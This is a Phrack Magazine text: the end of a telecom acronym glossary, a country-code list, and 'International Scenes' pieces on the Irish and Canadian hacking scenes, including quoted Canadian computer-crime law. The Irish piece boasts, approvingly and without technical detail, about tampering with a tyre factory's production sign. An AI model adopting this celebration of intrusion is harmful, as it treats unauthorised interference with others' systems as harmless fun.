EIn Error indication n (C/I channel code)
EKTS Electonic key telephone service
EKTS Electronic key telephone sets
EL Emergency reporting line INTER/TRA blocal 1-26
ELA Entity load analysis
ELDS Exchange line data service
ELECL Electrical
ELEMNTS Elements
ELI Electrical line interface
EM Emergency reporting center trunk INTER/TRA blocal 1-26
EM Encription module
EM End of medium (ASCII control)
EMC Electromagnetic capability
EMC Electromagnetic compatibility
EME Electromagnetic emission
EMI Electromagnetic interference
EML Expected measured loss
EMM Expandable mos memory
EMS Electromagnetic susceptibility
EMS Expanded memory specification
EMSCC Electromechanical switching control center
EMV EMC (german)
EN Entity
EN Entity number
EN Exchange network acess facility INTER/TRA blocal 1-26
ENABL Enable
ENFIA Exchange network facility for interstate access
ENHMT Enhancement
ENQ Enquiry
ENTDT Entered date and/or time
EO End office
EOC Embedded operation channel
EOE Electronic order exchange
EOM End of message
EOS Extended operating system
EOTT End office toll trunking
EP Entrance facility-program grade INTER/TRA blocal 1-26
EP Expedited data (SS7: in SCCP)
EPIC Extended PIC
EPL Electronic switching system program language
EPROM Erasable programmable read-only memory
EPSCS Enhanced private switched communication service
EQ Equalizer
EQ Equipment only-(network only) assignment INTER/TRA blocal 1-26
EQPT Equipment
ER Enhancement request
ER Error register
ER Exception report
ERAR Error return address register
ERC Error control (IOS)
EREP Environmental recording editing and printing
ERF Emergency restoration facility
ERL Echo return loss
ERP Effective radiated power
ERPMP Exception report pumper
ERR Error
ERRS Errors
ERTS Error rate test set
ERTS Error rate test sets
ERU Error return address update
ES Extension service-voice grade INTER/TRA blocal 1-26
ESAC Electronic systems assistance center
ESAP Emergency Stand-Alone prefix
ESAP Emergency stand-alone prefix
ESB Emergency service bureau
ESC Enhanced speech circuit
ESC Escape (ASCII control)
ESC Three way calling USOC
ESCC2 Extended high level serial communication controller
ESCC8 Like ESCC2
ESD Electrostatic discharge
ESD Extened super framing
ESF Extended super frame
ESF Speed calling USOC
ESFF Extended superframe format
ESL Emergency stand-alone
ESL Essental service
ESL Speed calling 8 code USOC
ESM Call forwarding USOC
ESM Economic study module
ESMTC Electronic system maintance
ESN Electronic serial number (Cell)
ESN Electronic switched network
ESN Emergency service number
ESP Enhanced service procider
ESP Enhanced service providers
ESP Essential service protection
ESP Print entire summary table
ESS Electronic switching system
ESSX Electronic switching systen exchange
EST Established
ESTAB Establish
ESX Call waiting USOC
ET Entrance facility-telegraph grade INTER/TRA blocal 1-26
ET Exchange termination
ETAS Emergency technical assistance
ETB End of transmission block
ETC Estimated trunk ccs value
ETF Electronic toll fraud
ETL Equipment test list
ETN Electronic tandem network
ETRI Electronics and telecommunications research institute (ROK)
ETS Electronic tandem switching
ETS Electronic translation systems
ETSACI Electronic tandem switching adminstration channel interface
ETSSP ETS status panel
ETX End of text
EU End user
EU Extension service-telegrasph grade INTER/TRA blocal 1-26
EUPOT End user-point of termination
EV Enhanced emergency reporting trunk INTER/TRA blocal 1-26
EV Expected value
EVB Busy call forward USOC
EVC Bust call forward extended USOC
EVD Delayed call forward USOC
EVD Delayed call forwarding
EVST (Ger) End exchange
EW Off network MTS/WATS equivalent service INTER/TRA blocal 1-26
EWSD (Ger) Electronic dialing system (digital)
EX Exercise
EXD ECS crossloading option
EXD Extra digit
EXD Extra digit (MDII)
EXP Extra pulse
EXP Extra pulse (MDII)
EXT Extension
EXTC Expenditure type code
F Facility direction
F Fault (indicator)
F Office or base unit from trouble report.
F1 Facility system
FA Frame aligner
FA Fuse alarm
FAA Facility accepted (SS7 in ISUP)
FAC Facility
FAC Facility Assiment Center
FACD Facility changed msg.
FACS Facilities assignment and control system
FADS Dorce administration
FANALM Fan alarm
FAP Facilities analysis plan
FAR Facility request (SS7: in ISUP)
FAR Federal acquisition regulation
FAS Frame alignment signal
FAST First application system test
FAT File allocation table
FAX Faximile
FC Feature control
FC Frame control
FC From cable
FC/EC Function code and environment code
FCA Final closure abandon (MDII)
FCAP Facility capacity
FCC Federal communications commission
FCC Forward command channel
FCC Frame control center
FCD Frame comtinuity date
FCG False cross or ground
FCS File control systemction
FCS Frame check sequence
FD Private line-data INTER/TRA blocal 1-26
FDD Frame due date
FDDI Fiber distributed data interface (x3t9.5)
FDI Feeder/distribution interfaces
FDM Frequency division multiplex
FDM Frequency-division multiplexing
FDMA FDM access
FDP Field development program
FDT Frame due time
FDX Full duplex
FDY Set fiscal day for LAC
FEA Custom calling feature/PIC
FEA Customer feature
FEAT Feature
FEAT Features
FEBE Far end block error (IOM2 monitor message)
FEC Forward error correction
FECC Front end communication computer
FED Far end data
FELP Far end loop process
FEMF Foreign electro-motive force
FEPS Facility and equipment planning system
FEV Far end voice
FF Check appropriate space where trouble is located
FF Form feed
FG Group-supergroup spectrum INTER/TRA blocal 1-26
FGA Feature group A
FGB Feature group B
FGC Feature group C
FGD Feature group D
FGE Feature group E
FGK Feature group K (ISDN Q.931)
FIB Forward indication bit (SS7)
FID Field indentifiers
FIFO First in
FIFO First in first out (storage)
FIL Filter
FIN Facility information msg.
FIOC Frame input/output controller
FIP Facility interface processor
FIPS Federal information processing standards
FISU Fill in signal unit (SS7)
FITL Fiber in the loop
FJ Frame jump (C/I channel code)
FKP False key pulse
FKP False key pulse (MDII)
FL Fault locate
FL Fault location
FLA Flag
FLD Field
FLEXCOM Fiber optic communication
FLR Frame layout report
FLT Flat
FM Frequency modulation
FM01 DCT alarm activated or retired - 1AESS
FM02 Possible failure of entire bank not just frame - 1A
FM03 Error rate of specified digroup - 1AESS
FM04 Digroup out of frame more than indicated - 1AESS
FM05 Operation or release of the loop terminal relay-1AESS
FM06 Result of digroup circuit diagnostics -1AESS
FM07 Carrier group alarm status of specific group - 1AESS
FM08 Carrier group alarm count for digroup - 1AESS
FM09 Hourly report of carrier group alarms - 1AESS
FM10 Public switched digital capacity failure - 1AESS
FM11 PUC counts of carrier group errors - 1AESS
FMAC Facility maintance administration center
FMAC Facility maintenance and control
FMC Force management center
FMM Finite message machine
FN Feature number
FN File name
FNBE Far and near end block error (IOM2 monitor message)
FNPA Foreign numbering plan area
FOA First office application
FOC Fiber optic communications
FON Fiber optics network
FOR Frame order report
FORPOT Foreign potential.
FOS Frame operations summary
FOS-ALC Fiber optic systems maintance - Alcatel
FOS-ROCK Fiber optic system maintance - Rockwell
FOT Forward transfer (SS7: in ISUP)
FP Functional protocol
FPC Foundation peripheral controller
FPC Frequency comparison pilots
FPS Fast packet switching
FR Fire dispatch INTER/TRA blocal 1-26
FR Fixed resistance
FR Flat rate
FRAC Frame aligner circuit
FRC Forced request configuration
FREQ Frequency
FRJ Facility rejected msg. (SS7 in ISUP)
FRMR Frame reject (LAP-D response)
FRPS Field reliability performance studies
FRQ Facility request message
FRS Flexible route selection
FS File separator
FS/SYM Function Schematic/Symbol Numbers (1AESS Test access)
FSA False start abandon
FSA False start abandon on incoming trunk
FSC Frame synchronization clock (i.e. IOM2)
FSK Frequency shift keying
FSN Forward sequence number
FT Foreign exchange trunk INTER/TRA blocal 1-26
FT Frame time
FTA Frame transfer analysis
FTC Frame transfer completion
FTE Frame transfer establishment
FTG Final trunk group
FTL Frame transfer lets
FTP File transfer protocol
FTR Frame transfer reprint
FTS Federal telecommunications system
FTW Frame transfer withdrawal
FUNCS Functions
FV Voice grade facility INTER/TRA blocal 1-26
FW Wideband channel INTER/TRA blocal 1-26
FWD Forward
FWM Frame work management
FWS Frame work station
FX Foreign exchange
FX Foreign exchange INTER/TRA blocal 1-26
FXO Foreign exchange circuit office direction
FXS Foreign exchange circuit station direction
G Spare box. use for special studies.
GAP (Ec) group of analysis and provision (for ONP)
GB Great britain
GBS Group bridging service
GC Group card
GCE Gated Oscillator Error
GCI General circuit interface (IOM/u(k0)-interface)
GCON Generic conditions
GCP Generate Control pulse
GCR General configuration register
GCS Group control system
GDSUCOM Global DSU common
GDSUCOM Global digital service unit common
GDX Gated diode crosspoint
GDXACC Gated diode crosspoint access
GDXC Gated diode crosspoint compensator
GDXCON Gated diode crosspoint control circuit
GEISCO General electric information services company
GFR General facility report
GG Getails of reported trouble.
GH Gain hit
GHZ Gigahertz
GID Group ID
GKCCR Generated key collection and compression routine
GLA Generate lists for assignment
GND Ground
GNS Gainslope
GNS Gainslope test (SARTS command)
GOC General order control (TIRKS)
GOS Grade of service
GP Group processor
GPA Gas pressure alarm
GPIB General purpose interface bus
GPPC General purpose power controller
GPS Global positioning system
GR General requirments (BellCoRe)
GRA GRS acknowledgement
GRASP Generic access package
GRD Ground fault.
GRD Ground.
GRID Line unit grid.
GRP Group
GRP MOD Group modulator
GRS Circuit group reset (SS7: in ISUP)
GS Ground start (on-hook normal)
GS Group separator
GSA General services administration
GSAT General telephone and electronics satellite corporation
GST Ground start signaling
GSZ Group size
GTC General telephone company
GTE General telephone electronics
GTEI Global tei
GTS Gamma transfer service
GTT Global title transmission
GWY Gateway
Ger German
H Hold state (in EOC)
H Hours
H Trouble ticket number. subparagraph 5.6.4.
H&D High and dry (trunk test)
H- High-
H-RAP Hardware reliability assurance program
HAC Hands-free add-on circuit (for speakerphone)
HBS Hunt group blocks of spares
HC High capacity 1.544 mb/ps-service code for LATA access
HC Hunt count
HCDS High capacity digital service
HCDS High-capacity digital services
HCFE High-capacity front end
HCSDS High-capacity satellite digital service
HCTDS High-capacity terrestrial digital service
HD High capacity 3.152 mb/ps-service code for LATA access
HDB3 High-density bipolar 3 (cept PRI)
HDFI HSM digital facilities interface
HDLC High level DLC
HDLC High-level data link control
HDSL High bit-rate digital subscriber line
HDTV High definition television (soon to be the new buzz word!!)
HDW Hardware
HDX Half duplex
HE High capacity 6.312 mb/ps-service code for LATA access
HEAP Home energy assistance program
HEHO High end hop off
HF High capacity 6.312-service code for LATA access
HF Hunt-from telephone number
HFCC High capacity facility control center
HFR Hardwara failure rate
HG High capacity 274.176 mb/s-service code for LATA access
HGBAF Hardware group blocking acknowledgment failure
HGR Hunt group report
HGS Hunt group summary
HGUAF Hardware group unblocking acknowledgment failure
HH History header
HH Record of repair activity.
HI High
HI High impedance (C/I channel code)
HI Highway interrupt
HIC Hybrid integrated circuit
HIM Host interface module
HIS Hunting ISH
HK Hook
HL IT Siemens semiconductors (hl)
HLC Highest lead factor group count
HLDG Holding
HLLAPI High level language application program interface
HLSC High-level service circuits
HM1 Intercom plus USOC
HMCL Host message class assignment
HMP Intercom plus
HNPA Home numbering plan area
HNS Hospitality network service
HOBIC Hotel billing information center
HOBIS Hotel billing information system
HOLD Call hold (i.253 b)
HP Hewlett-packard
HP Non-DDS digital data 2.4 kb/s INTER/TRA blocal 1-26
HPO High performance option
HQ Non-DDS digital data 4.8 kb/s INTER/TRA blocal 1-26
HR Hour
HR Non-DDS digital data 9.6 kb/s INTER/TRA blocal 1-26
HRS Hours prefix
HS High capacity subrate-service code for LATA access
HSCC High level serial communication controller sab82520
HSCX Extended hscc sab82525
HSM Host switching module
HSSDS High-speed switched digital service
HT Horizontal tabulator
HT Hunt-to telephone number
HTI Highway transfer interrupt
HU High usage
HU High-usage trunk
HUNT Hunting
HUTG High usage trunk group
HW High and wet.
HW High-and-wet
HW Non-DDS digital data 56 kb/s INTER/TRA blocal 1-26
HW Pcm highway
HZ Hertz
I Cable and pair or associated equipment
I Information (LAP-D command)
I Installation
I Invalid
I&I Investment and inventory
I&M Customer services installation and maintenance
I&M Installation & maintenance
I- Information (numbered i-frames)
I/O Ineffective other
I/O Input/output devices
I/O Tnput/output
I0 Feature removed
I1 Added feature
IA Immediate action
IA Ineffective attempts
IAA Ineffective attempt analysis.
IAAN Immediatel action report
IAC0 DLI 0 access error
IAC1 DLI 1 access error
IACS Intergrated access cross-connected system
IAD Incomplete address detected (incoming)
IAM Initial address msg. (SS7: in ISUP)
IB Instruction buffer
IBC ISDN burst transceiver circuit
IBN Integrated business network
IBROFC ISDN BRCS and Analog Office totals
IC Incoming call (x.25)
IC Independent carrier
IC Installation centers
IC Inter-LATA carrier
IC Inter-exchange carrier
IC Interexchange carriers
IC/MC Installation and maintence centers
ICA Incoming advance
ICA Incoming advance (MDII)
ICAN Individual circuit analysis
ICAO International civil aviation organization
ICC ISDN communications controller
ICC Interstate commerce commission
ICCU Inmate call control unit
ICD Interactive call distribution
ICL Intra-RSM communication link
ICLID Individual calling line id
ICM Integrated call management
ICN Interconnecting network
ICOM (taiwan) integrated communication
ICOT Intercity and outstate trunk
ICP Intercept
ICPOT Interexchange carrier-point of termination
ICSC Inter-LATA customer service center
ICSC Interexchange carrier service center
ICSC Interexchange customer service center
ICUG International closed user groups
ICUP Individual circuit usage and peg count
ICUR Individual circuit usage recorder
ID Idle control code
IDA (gb) interated digital access (b64+b8+d8)
IDC Information distribution companies
IDCI Interim defined central office interface
IDCU Integrated digital carrier unit
IDCU Integrated digital carrier unit .
IDCU Integrated digital carrier unit i.e. AT&T Series 5 RT FP 303G
IDDD International direct distance dialing
IDEC ISDN d-channel exchange controller
IDF Intermediate distributing frame
IDI Initial domain identifier (ISO 7498)
IDLC Integrated digital loop carrier
IDLC Intergrated digital loop carrier
IDP Individual dialing plan
IDPC Integrated data protocol controller
IDS Internal directory system
IDVC Integrated data/voice channel
IEC ISDN echo cancellation circuit
IEC Interexchange carrier
IEC International electrotechnical comission
IEC-P (old name of iec-q3)
IEC-Q1 Iec for 2b1q peb2091
IEC-Q2 Iec-q specially for lt and NT1 (without microprocessor)
IEC-Q3 Iec-q with parallel processor interface (i.e. for daml)
IEC-T Iec for 4b3t peb2090
IEEE Institute of electrical and electronics engineers
IEPC ISDN exchange power controller
IF Intermediate frequency
IFAC Integrated digital carrier unit facility
IFRB International frecuency registration board
IFRPS Intercity facility relief planning system
IFS (switzerland) integrated telecom service
IGS Idenitfy graphic subrepertoire (teletex)
IIN Integrated information network
IJR Input a jeopardy reason
ILC ISDN link controller
ILINE IDCU line counts.
IM Input mux
IM Interface module
IMA Additional ineffective machine attempts
IMAS Integrated mass announcement system
IMC IOS mailbox control
IMCAT Input message catalog
IMCF Interoffice multiple call forwarding
IMD Intermodulation distortion
IMM Input message manual
IMMU IOS memory management unit
IMP Impedance
IMP Impules per minute
IMP Interpersonal messaging protocol (x.420: p2)
IMS Interprocessor message switch
IMT Inter-machine trunk
IMTS Improved mobile telephone service
IMU Input measured ccs usage data
IN Intelligent network
IN/1 Intelligent network/1
INA Intergrated network access
INAP Intelligent network access point
INC Incoming trunk groups
INC International calling
INC International carrier
INC SEL Incoming selector
INCAS-A Integrated network cost analysis - access
INCAS-LT Integrated network cost analysis - local and toll
INCAS-S Integrated network cost analysis - shared
INCAS/E Integrated network cost analysis system
INCAS/I Integrated network cost analysis system - embedded
INCIS Integrated network cost information system
INCP Incomplete
IND Individual
INF Information
INF Information (SS7: in ISUP)
INIT Allocation table initalization
INL Inter node link
INN Inter node network
INQ Complete circuit inquiry
INR Information request (SS7: in ISUP)
INS (japan) information network system (b64+b16+d8)
INT Interrupt (i.e. C/I channel code)
INTCCTRL International code control (NTI)
INTCHG Interexchange
INTEGRIS Integrated results information service
INTELSAT International telecommunications satellite consortium
INTR Interrupt
INW INWATS [code 258(8000-8299)]
INWATS Inward wide area telecommunications system
INWATS Inward wide area telephone service
INWBLKD INWATS returned blocked
INWBLKD Inward wide area telecommunications service (INWATS) returned
blocked
INWBUSY INWATS all lines busy
INWCCBL INWATS code control blocked
INWDBOV INWATS data base overload
INWDBTO INWATS data base timeout
INWDSBL INWATS direct signaling blocked
INWNNPA INWATS nonpurchased NPA
INWNNPA INWATS nonpurchased numbering plan area (NPA)
INWNOXL INWATS returned no translation
INWONPA INWATS invalid ONPA
INWONPA INWATS invalid originating numbering plan area (ONPA)
INWOVLD INWATS returned overload
INWUNEQ INWATS returned unequipped
INWVLIN INWATS vacant line number
INWVNXX INWATS vacant NXX
IO Inward operator
IOAU Input/output access unit (univac)
IOC Independent operating company
IOC Input/output controler (shelf)
IOC Integrated optical circuit
IOC International overseas center
IOCC International overseas completion center
IOCP Input/output configuration process
IOCS Input/output control system
IODB IDCU on-demand B-channel
IOI Secondary input/output interface pack(s)
IOM ISDN-oriented modular (architecture and interfaces)
IOM2 Extended iom
IOMI Input/output microprocessor interface
IOP Input-output processor
IOP Input/output Processor
IOP Input/output driver
IOP Input/output processor
IOS ISDN operational software
IOS Input/output supervisor (IBM)
IOS Inventory order system
IOSF Input/output shelf assignment
IOT Inter-office trunk
IOT Interoffice test command (SARTS command)
IOT Interoffice testing
IOTC International originating toll center
IP Information provider
IP Inprogress
IP Intermediate point
IP Internet protocol
IPABX ISDN pabx
IPAC ISDN pc adapter circuit
IPACS Interactive planning & control system
IPAT ISDN primary access transceiver
IPB Sipb
IPBC IOM2 PBC (old name for EPIC)
IPC Inter-process communication
IPC Interprocess communication
IPCS IOS process control system
IPCS Installation product costing system
IPCS Interactive problem control system
IPIB Intelligent personal computer interface board
IPIDB IDCU peripheral interface data bus
IPL Initial program load
IPL Interoffice private line signaling
IPL Interoffice private line signaling test (SARTS command)
IPLAN Integrated planning and analysis system
IPLS InterLATA private line services
IPM Impulse per minute
IPM Impulses per minute
IPM Interruptions per minute
IPP IOS protocol part
IPP Integrated planning process
IPPC Interdepartmental project planning committee
IPR Installation performance results system
IPS Installation performance results
IPS Integrated Provisioning System
IPS Integrated provisions system
IPX Integrated packet exchange
IQS Instant request system
IR Incoming register
IRBR Integrated resource billing report system
IRC International record carrier
IRIS Industry relations information system
IRLF Incoming register link frame
IRM Information resource management
IRMC Incoming register marker connector
IRO Industry relations operations
IROR Internal rate of return
IRP Integrated revenue planning
IRPC ISDN remote power control psb2120
IRR Internal rate of return system
IRRS Interactive request and retrieval system
IRS Industrial revenue summary
IRT IDCU remote digital terminal
IRU Integrated recovery utility (sperry)
IS Interrupt set
IS/SADQ Interstate special access demand quantification
ISA Indicate status application
ISAC-P ISDN subscriber access controller
ISAC-S ISDN subscriber access controller
ISAM Indexed sequential access method
ISC Intelligent serial controller
ISC International switching center
ISC Planintercompany services coordination plan
ISC/TE Information systems center for technical education
ISCAR Information systems costs analysis reports
ISCOM SWBT intercompany service coordination (ISC) order monitor
ISCP Integrated service control point
ISCP/MSAP ISCP/multi-service application platform
ISCP/SPOCK ISCP/service provisioning and on-line creation tool kit software
ISDN Integrated services digital network
ISF Inquire on a single facility
ISG Isolated system grounding
ISH Complete circuit inquiry short
ISI Industry support layout
ISIS Interstate settlements information system
ISLM Integrated services line module
ISLU Integrated services line unit
ISLUCC Integrated services line unit common controller
ISLUCD Integrated services line unit common data
ISLUHLSC Integrated services line unit high level service circuit
ISLUMAN Integrated services line unit metallic access network
ISLURG Integrated services line unit ringing generator
ISM ISDN switching module
ISM Interactive synchronous mode
ISMP Industry specific measurement plan
ISMS Integrated service management system
ISMTL Information systems management training
ISN Information systems network
ISN Integrated systems network
ISNET Interim solution network (Kansas city only)
ISO Information systems organization
ISO International organization for standardization
ISOFC ISDN office totals
ISOPDB Information systems organization planning data base
ISOSS Intercompany service order switching system
ISP Intermediate service part
ISPBX Integrated systems PBX
ISPC International signaling point code (SS7)
ISPF Interactive system productivity facility
ISPI ISDN packet interface
ISRP Information systems rules panel
ISS Integrated switching system
ISS Issue
ISSANRC Interstate special access non-recurring
ISSC Interfunction special service coordination
ISSCO Intertoll
ISSN Integrated special services network
ISSN Intergrated specal services network
ISSS ISDN supporting system
ISTA Interrupt status register
ISUP ISDN user part
ISUP ISDN user part (SS7: q.76x)
ISUP Integrated services user part
IT Inactivity test (SS7: in SCCP)
IT Intertandem tie trunk INTER/TRA blocal 1-26
ITAC ISDN terminal adaptor circuit
ITC Independent telephone company
ITC Interdepartmental training center at dallas-texas for
ITD Intertoll dial
ITEA Interoffice trunks engineering and administration
ITF Integrated test facility
ITG Intergrated traffic generator
ITIMS Integrated transportation information management system
ITIMS/IE Itims/information expert
ITM Cable pair item number
ITNA Improves thrid number acceptance
ITNO Item number
ITS Institute of telecommunication science
ITS Integrated test system
ITS Interactive training system
ITSE Incoming trunk service evaluation
ITSO Incoming trunk service observation
ITSTC Information technology steering committee (cen
ITT Idle trunk test
ITU International telecommunication union
ITU International telecommunications union
ITVSE Intermediary transport vendor service center
ITW Instructional technology workshop
IU Network/port interface unit
IUP Installed user program (IBM)
IVD Integrated voice data
IVP Installation verification procedures
IVP Installation verification program
IVTS International video teleconferencing service
IWF Interworking facility (gateway)
IWU Interworking unit (gateway)
IX Interactive executive
IXC Or icinterexchange carrier
IXM Interexchange mileage
IZ Interzone
==Phrack Magazine==
{Acronyms Part V}
----------------------EOF------EOF-------EOF------EOF----------------------
==Phrack Magazine==
International Scenes
There was once a time when hackers were basically isolated. It was
almost unheard of to run into hackers from countries other than the
United States. Then in the mid 1980's thanks largely to the
existence of chat systems accessible through X.25 networks like
Altger, tchh and QSD, hackers world-wide began to run into each other.
They began to talk, trade information, and learn from each other.
Separate and diverse subcultures began to merge into one collective
scene and has brought us the hacking subculture we know today. A
subculture that knows no borders, one whose denizens share the common goal
of liberating information from its corporate shackles.
With the incredible proliferation of the Internet around the globe, this
group is growing by leaps and bounds. With this in mind, we want to help
further unite the communities in various countries by shedding light
onto the hacking scenes that exist there. We have been requesting files
from people to describe the hacking scene in their country, but
unfortunately, more people volunteered than followed through (you know
who you are.) By next issue we will have more, I'm sure, but for now,
we want to introduce you all to the scenes in Ireland and Canada.
*****************************************************************************
AD Andorra
AE United Arab Emirates
AF Afghanistan
AG Antigua and Barbuda
AI Anguilla
AL Albania
AM Armenia
AN Netherland Antilles
AO Angola
AQ Antarctica
AR Argentina
AS American Samoa
AT Austria
AU Australia
AW Aruba
AZ Azerbaidjan
BA Bosnia-Herzegovina
BB Barbados
BD Bangladesh
BE Belgium
BF Burkina Faso
BG Bulgaria
BH Bahrain
BI Burundi
BJ Benin
BM Bermuda
BN Brunei Darussalam
BO Bolivia
BR Brazil
BS Bahamas
BT Buthan
BV Bouvet Island
BW Botswana
BY Bielorussia
BZ Belize
CA Canada
CC Cocos Island
CF Central African Republic
CG Congo
CH Switzerland
CI Ivory Coast
CK Cook Islands
CL Chile
CM Cameroon
CN China
CO Colombia
CR Costa Rica
CS Czechoslovakia
CU Cuba
CV Cape Verde
CX Christmas Island
CY Cyprus
DE Germany
DJ Djibouti
DK Denmark
DM Dominica
DO Dominican Republic
DZ Algeria
EC Ecuador
EE Estonia
EG Egypt
EH Western Sahara
ES Spain
ET Ethiopia
FI Finland
FJ Fiji
FK Falkland Islands
FM Micronesia
FO Faroe Islands
FR France
FX France
GA Gabon
GB Great Britain (UK)
GD Grenada
GE Georgia
GH Ghana
GI Gibraltar
GL Greenland
GP Guadeloupe
GQ Equatorial Guinea
GF French Guyana
GM Gambia
GN Guinea
GR Greece
GT Guatemala
GU Guam
GW Guinea Bissau
GY Guyana
HK Hong Kong
HM Heard & McDonald Island
HN Honduras
HR Croatia
HT Haiti
HU Hungary
ID Indonesia
IE Ireland
IL Israel
IN India
IO British Indian Ocean Territories
IQ Iraq
IR Iran
IS Iceland
IT Italy
JM Jamaica
JO Jordan
JP Japan
KE Kenya
KG Kirgistan
KH Cambodia
KI Kiribati
KM Comoros
KN St.Kitts Nevis Anguilla
KP North Korea
KR South Korea
KW Kuwait
KY Cayman Islands
KZ Kazachstan
LA Laos
LB Lebanon
LC Saint Lucia
LI Liechtenstein
LK Sri Lanka
LR Liberia
LS Lesotho
LT Lithuania
LU Luxembourg
LV Latvia
LY Libya
MA Morocco
MC Monaco
MD Moldavia
MG Madagascar
MH Marshall Islands
ML Mali
MM Myanmar
MN Mongolia
MO Macau
MP Northern Mariana Island
MQ Martinique
MR Mauritania
MS Montserrat
MT Malta
MU Mauritius
MV Maldives
MW Malawi
MX Mexico
MY Malaysia
MZ Mozambique
NA Namibia
NC New Caledonia
NE Niger
NF Norfolk Island
NG Nigeria
NI Nicaragua
NL Netherlands
NO Norway
NP Nepal
NR Nauru
NT Neutral Zone
NU Niue
NZ New Zealand
OM Oman
PA Panama
PE Peru
PF Polynesia
PG Papua New Guinea
PH Philippines
PK Pakistan
PL Poland
PM St. Pierre & Miquelon
PN Pitcairn
PT Portugal
PR Puerto Rico
PW Palau
PY Paraguay
QA Qatar
RE Reunion
RO Romania
RU Russian Federation
RW Rwanda
SA Saudi Arabia
SB Solomon Islands
SC Seychelles
SD Sudan
SE Sweden
SG Singapore
SH St. Helena
SI Slovenia
SJ Svalbard & Jan Mayen Islands
SL Sierra Leone
SM San Marino
SN Senegal
SO Somalia
SR Suriname
ST St. Tome and Principe
SU Soviet Union
SV El Salvador
SY Syria
SZ Swaziland
TC Turks & Caicos Islands
TD Chad
TF French Southern Territories
TG Togo
TH Thailand
TJ Tadjikistan
TK Tokelau
TM Turkmenistan
TN Tunisia
TO Tonga
TP East Timor
TR Turkey
TT Trinidad & Tobago
TV Tuvalu
TW Taiwan
TZ Tanzania
UA Ukraine
UG Uganda
UK United Kingdom
UM US Minor Outlying Islands
US United States
UY Uruguay
UZ Uzbekistan
VA Vatican City State
VC St.Vincent & Grenadines
VE Venezuela
VG British Virgin Islands
VI U.S. Virgin Islands
VN Vietnam
VU Vanuatu
WF Wallis & Futuna Islands
WS Samoa
YE Yemen
YU Yugoslavia
ZA South Africa
ZM Zambia
ZR Zaire
ZW Zimbabwe
****************************************************************************
HACKING IN IRELAND
BY
HAWKWIND
So you can imagine, one warm sunny summer's evening, when there
was really nothing better to do in Dublin, strange things started to
happen at the tyre factory. Yes, strange things indeed. Suddenly the
workers got very lazy and started slowing down their production,
becoming slower and slower and slower. The numbers stopped counting up
on the glowing sign. Then the digits oddly started counting backwards.
Down they went, getting faster and faster -people began to picture
enraged workers destroying tyres in a crazed frenzy. Soon our sign
showed that there were no tyres left and it began to dive into negative
numbers of tyres. The passers-by scratched their heads in astonishment.
Ah, but enough fun -this really was a very good tyre company
with very hard-working workers. They deserve lots of bonuses -heck,
didn't someone say this was the most productive factory in Europe? Well
it was that day anyway! *evil cackle* So the signs stopped counting
backwards, and suddenly began to race forwards like there was no
tomorrow. The workers were scurrying back and forth at lightening speed
-one hundred, two hundred..a thousand...ten thousand...what, a hundred
thousand! Soon our good workers had produced more tyres in the space of
20 minutes, than visitors Disneyland had in 25 years...
Ah yes, these are the things that Irish hackers like to do -we
still wonder if the management gave all those good workers their
bonuses??
Well, I'll end the tale there for the moment. Hopefully you've
gotten a little flavor of our little Underground, watched over by our
Little Brother, in our little country called Ireland. I'm not sure how
I ended up writing this article, but since nobody else stepped forward, I
thought Ireland should at least get some kind of mention, if nothing
else -so you can /dev/null any flames.
Before I sign off, I'd just like to thank Phrack not only for
giving me the chance to tell my tale, but for supplying us with a great
publication and guide to the Underground. Finally, if you are an Irish
hacker/phreaker, then get in touch now!!! -I really want to be able to say
that I can count the number of Irish hackers I know on two hands, and not
just one, before the end of the decade! Also, I am always interested in
talking to anyone interested in the hack/phreak world so get in touch if
you want to chat -just remember, we are no elite!
(I don't suppose anyone out there, knows anything about the Irish phone
system? *shrugs*)
Ok, I can be reached at the following, for the next little while:
(Yes, I do have Irish a/c's but not for thine eyes...)
[email protected]
[email protected]
[email protected] (note: no 'd' at end userid)
Slan Leat,
Hawkwind.
*****************************************************************************
Canada
All is Quiet on the Northern Front
This is not to say that Canada does not have a scene of its own
nor is it attempting to take away from those scenes that have
developed fully on their own within .ca. It is simply bringing to
light a problem that plagues our scene and dilutes it for those
who are serious about the computer underground, and whatever
ideals it may contain.
If you travel the nets in Canada you will find that dissent and
"ElYtEeGoStRoKInG" are staple with both the Hacking and Warez
scenes all throughout the nine provinces and 2 territories. As I
am sure you know this is not a problem unique to .ca. However in
a scene as minute and spread painfully thin as ours, arrogance
and mis-communication can be fatal in the way of cooperation
gaps. This has proved the case many times in the recent past, and
I am sure it will in the near future as well.
While Canada has been for the most part largely un-abused by the
'Computer Criminal'. It's laws are none the less fairly advanced.
Our legislators to their credit have kept a close eye on our
neighbors in the south, and have introduced laws accordingly.
342.1
(1) Every one who, fraudulently and without color of right,
(a) obtains, directly or indirectly, any computer service,
(b) by means of an electro-magnetic, acoustic, mechanical
or other device, intercepts or causes to be intercepted,
directly or indirectly, any function of a computer system, or,
(c) uses or causes to be used, directly or indirectly, a
computer system with intent to commit an offense under
paragraph (a) or (b) or an offense under section 430 in
relation to data or a computer system
is guilty of an indictable offence and liable to
imprisonment for a term not exceeding ten years, or is
guilty of an offence punishable on summary conviction.
(2) In this section, "computer program" means data representing
instructions or statements that, when executed in a computer
system, causes the computer to perform a function;
"computer service" includes data processing and the
storage or retrieval of data; "computer system" means
a device that, or a group of interconnected or related
devices one or more of which,
(a) contains computer programs or other data, and
(b) pursuant to computer programs,
(i) performs logic and control, and
(ii) may perform any other function;
"data" means representation of information or of concepts
that are being prepared or have been prepared in a form
suitable for use in a computer system;
"electro-magnetic, acoustic, mechanical or other device"
means any device or apparatus that is used or is capable of
being used to intercept any function of a computer system,
but does not include a hearing aid used to correct subnormal
hearing of the user to not better than normal hearing;
"function" includes logic, control, arithmetic, deletion,
storage and retrieval and communication of telecommunication to,
from or within a computer system; "intercept" includes listen
to or record a function of a computer system, or acquire the
substance, meaning or purport thereof.
430.
[...]
(1.1) Every one commits mischief who willfully
(a) destroys or alters data;
(b) renders data meaningless, useless or ineffective;
(c) obstructs, interrupts or interferes with the lawful
use of data; or
(d) obstructs, interrupts or interferes with any person
in the lawful use of data or denies access to data
to any person who is entitled to access thereto.
[...]
As you can see our criminal code carries severe penalties for
both Hacking and Virus spreading however, there is little
precedent to set sentences by. While this is reassuring, there
seems to be a new trends to prosecute those who are caught at
computer crime. Moreover it seems to be a trend to prosecute with
setting precedence in mind.. So for those of you in .ca who have
busted recently I would begin to fear right about now.
For the most part most computer crime in Canada that results in
busts is telco related, most often the charges are federal but
the sentences are light, however as I said before, this is
changing. And will continue to change with each new bust ,
welcome to the new dawn I suppose.
